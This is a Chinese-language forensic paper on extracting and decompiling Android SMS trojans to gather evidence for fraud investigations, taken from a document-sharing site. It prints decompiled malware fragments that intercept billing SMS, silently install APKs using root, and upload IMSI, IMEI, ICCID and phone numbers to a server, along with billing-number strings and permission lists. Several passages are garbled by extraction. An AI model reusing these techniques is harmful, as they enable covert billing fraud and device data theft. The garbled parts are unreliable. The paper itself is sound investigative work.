(arrayOfSmsMessage[i13].getMessageBody().contains("元/次")))abortBroadcast();(2). 获取ROOT权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");File localFile2 = this.mContext.getFilesDir();String str = localFile2 + "/" + paramString2;Process localProcess = localRuntime.exec(str);}private void installAPK()private void uninstallPlugin(){try{int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN");Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class); ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis());Object localObject1 = localHashtable.put("id", str8);Object localObject2 = localHashtable.put("imsi", str4);Object localObject3 = localHashtable.put("imei", str5);Object localObject4 = localHashtable.put("iccid", str6);Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss");Object localObject6 = localHashtable.put("ctime", str9);Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101");Object localObject9 = localHashtable.put("uid", str1);Object localObject10 = localHashtable.put("bid", str2);Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener);NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4);String[] arrayOfString = new String[1];arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String>protected String doInBackground(String[] paramArrayOfString)URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();URL localURL2 = localURL1;String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection();localHttpURLConnection.setRequestMethod("GET");localHttpURLConnection.setConnectTimeout(5000);localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r ");installAPK();contains("10658166")contains("83589523")contains("客服")contains("资费")四、行为分析运行后获取ROOT权限,私自下载安装程序;并发送扣费短信,订制SP服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
android手机木马的提取与分析
Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件,对手机木马病毒的特点、植入方式、运行状态进行了研究,利用
dex2jar、jdgui等工具软件查看apk文件源代码。
结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性,提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。
智能手机给用户带来便利的同时,手机恶意软件也在各种各样的违法活动中充当了重要角色,其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。
Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。
他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现,这种恶意短信中附的网址,其实就是诱导下载一个手机软件,安装后手机内并不会显示出该应用,但其中的木马病毒已植入,后台会记录下机主的一切操作,可以随时监控到手机记录。
若机主登录网银、支付宝、微信红包等,银行卡账号、密码就都被泄露了,黑客能轻易转走资金。
此类案件近期呈现高发的趋势。
面对各种各样善于伪装隐藏的手机木马病毒,如
何提取分析,并固定证据成为一项重要工作。
本文从Android手机木马病毒的特点入手,讲述了如何提取分析关键代码与配置数据,从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。
诈骗、盗窃的目标不变,那就是诱导点击安装短信的链接网址中的木马。
木马植入到目标系统,需要一段时间来获取信息,必须隐藏自己的行踪,以确保木马的整体隐藏能力,以便实现长期的目的。
主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。
然后实现了Android系统下木马攻击的各种功能,主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。
1、木马病毒的植入、提取 1.1植入(1)很多用户不希望支付软件费用,含有木马的手机应用的第三方网站通过提供破解版、修改版来诱骗下载。
(2)通过发送短信或彩信到用户手机,诱骗手机用户点击短信中URL或者打开彩信附件,从而达到了植入木马的目的。
带网址链接的短信诈骗是目前十分流行的诈骗方式,短信内容不断变化,但对于手机系统来讲,为了能够及时有效的发现手机病毒木马程序必须采用动静结合的方式。
通过对Android运行任务进行检查可以发现是否有可疑程序在运行。
1.2提取提取的方式,一是根据URL链接地址,从互联网上进行提取;二是
根据手机存储的位置,找到安装文件进行提取,比较常见的提取位置有:一般存放在根目录下、DownLoad文件夹中、还有隐藏在系统文件system文件夹中;三是遇到URL 无法打开,安装源文件被删除等情况,借助豌豆荚、360手机助手等工具软件,从应用程序找出木马病毒进行导出成apk文件。
2、木马病毒的分析Android木马程序由client端程序和server端程序组成,server端通过移动互联网控制client端,client端程序安装在目标手机上,接收控制端的一些命令并执行,同时把结果返回给控制端,android木马带来的危害主要是远程窃密、通话监听、信息截获和伪造欺骗。
Android手机木马病毒程序是以APK文件形式存在的,JAVAAPK是基于JAVA开发的,JAVA可以用的反编译要比其他高级语言容易实现。
在的优势之一就是APKapktool、DoAPK、apkmanager、Dex2jarJAVA环境中图片、文件反编译,Jar语言资源等文件。
一个生成应用程序的APKXML和jdgui等工具将文件结构为:配置、JAVA“源代码和配置文件”、““res\classes.dex存放资源件””Dalvik码、、
“AndroidManifest.xmMETAINF\“resources.arsc程序全局”编译后的二进制资源文件。
其中classes.dex和AndroidManifest.xml是侦查破案工作中分析的重点。
AndroidManifest.xml是程序全局配置文件,描述应用的名
字、版本、权限、引用库文件等信息,每一个应用程序的根目录都会有一个classes.dex接运行的执行程序,是Dalvik字节码,利用解析工具可以将其转换为可以在AndroidAndroidManifest.xmlDalvik虚拟机上直文件;Java 源代码进行阅读和理解。
本文通过介绍一种新型的木马病毒程序MM.APK发送到多位用户手机,来对Android系统中的木马进行分析。
该款病毒程序接收到银行发送的转账验证码,造成财产损失20余万元。
2.1AndroidManifest.xml 该新型木马程序,AndroidManifest.xml文件定义的功能有:启动服务、tActionActivityForResult、获取邮件获取用户SessionID(手机串号、获取本机电话号码、)、添加View、调用读取文件、Intent的激活se?tent件、、传递附加信息、、注册初ContentObserverURL、发送短信、、登录邮箱、初始化
In?App读取手机短信、隐藏桌面快捷图标、获取运行写入文件、service发送邮共享数据等功能。
2.2classes.dex、查询文件gui使用dex2jar工具对classes.dex文件进行反编译,再使用jd?信点击下载到手机后会自动安装并在后台运行,工具来查看源代码文件的具体内容。
首先,该程序通过短手机界面会自动隐藏图标;其次,MM.APK软件安装成功后会向特定手机号码136***********************8120发送安装成功信息,下面是木马病毒功能分析:
android/app/NotificationManager;->notify危险函数ContentResolver;->query信息通知栏java/net/URL;-
>openConnection读取联系人、短信等数据库SmsReceiver;->abortBroadcast连接URLSmsManager;->sendMultipartTextMessage拦截短信接收SmsManager;->sendTextMessage发送彩信TelephonyManager;->getLine1Number发送普通短信ContentResolver;->delete获取手机号、删除短信、联系人动服务tvthrbbfff.abr6yyhr.BootReceiver监控短信(收到短信)启
tvthrbbfff.abr6yyhr.BootReceivertvthrbbfff.abr6yyhr.BootRec eiver开机启动服务stateReceiver屏幕解锁启动服务网络连接改变时启
tvthrbbfff.abr6yyhr.SmsReceiver监控短信(收到短信)启tvthrbbfff.abr6yyhr.SmsReceiver屏幕解锁启动服务android.permission.READ SMS权限列表
android.permission.WRITE SMS读取短信
android.permission.SEND SMS写短信
android.permission.RECEIVE SMS发送短信
android.permission.READ PHONE STATE监控接收短信android.permission.READ CONTACTS读取联系人信息读取电话状态信息android.permission.RECEIVE WAP PUSH接收
wappushandroid.permission.RECEIVE
MMSandroid.permission.CALL PHONE接收彩信视、修改有关拨出电话android.permission.PROCESS OUTGOING CALLS拨打电话监android.permission.INTERNET连接网络(2G状态(android.permission.ACCESS NETWORK STATE 或2G或3G)读取网络3G)状态
android.permission.ACCESS WIFI STATE读取wifi网络android.permission.READ LOGS读取系统日志3结束语通过对新型木马病毒的分析,此类型的木马程序主要是定向发送,盗窃银行卡钱财为主,嫌疑人留有实施犯罪接收的邮箱和手机号码,案件侦查人员和取证人员可以通过此类方法掌握该类木马病毒实施恶意行为的配置数据、JAVA关键代码等内容,最终确定回传方式,快速锁定犯罪嫌疑人。
但对于采用代码混淆或加壳的手机木马病毒程序,很难进行精准还原。
在具体的工作实践中,充分利用多种技术,灵活运用网络资源,分析木马病毒使用者的目的、动机,进而分析案件线索,为案件的侦破提供方向和技术执掌,充分发挥网络侦查的作用。